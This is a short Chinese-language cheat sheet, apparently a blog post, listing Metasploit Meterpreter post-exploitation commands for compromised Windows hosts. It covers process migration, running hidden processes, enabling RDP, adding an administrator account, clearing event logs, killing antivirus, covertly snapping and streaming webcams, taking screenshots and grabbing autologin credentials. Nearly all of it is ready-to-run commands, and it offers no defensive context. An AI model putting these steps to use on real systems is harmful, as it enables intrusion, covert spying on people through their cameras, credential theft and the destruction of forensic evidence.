metasploit后渗透阶段
metasploit后渗透阶段
一、进程迁移
1、手动迁移:
查看进程
ps
获取meterpreter进程PID
getpid
迁移到指定PID进程中
migrate 1234
2、自动迁移
run post/windows/manage/migrate
二、运行进程
用execute在目标系统中执行指定的程序:
execute -f /usr/test.exe [options]
可选参数:
-H:创建隐藏进程
三、启用RDP:
run post/windows/manage/enable_rdp
四、添加管理员账号:
run getgui -u hack -p hack
五、清除日志:
clearev
六、查看系统信息 :
sysinfo
七、查看是否为虚拟机 :
run post/windows/gather/checkvm
八、关闭主机 :
shutdown
九、查看运行时间 :
idletime
十、关闭杀软 :
run post/windows/manage/killav
十一、扫描摄像头:
webcam_list
十二、抓拍照片:(保存在root目录下)
webcam_snap
十三、直播模式:
webcam_stream 访问返回的网址可看到画面
十四、弹消息框:
msg /server:127.0.0.1 * "hello"
十五、列举已登录的用户:
run post/windows/gather/enum_logged_on_users
十六、抓取自动登录的用户名密码:
run windows/gather/credentials/windows_autologin
十七、抓取屏幕:
screenshot
或
load espia
screengrab
评论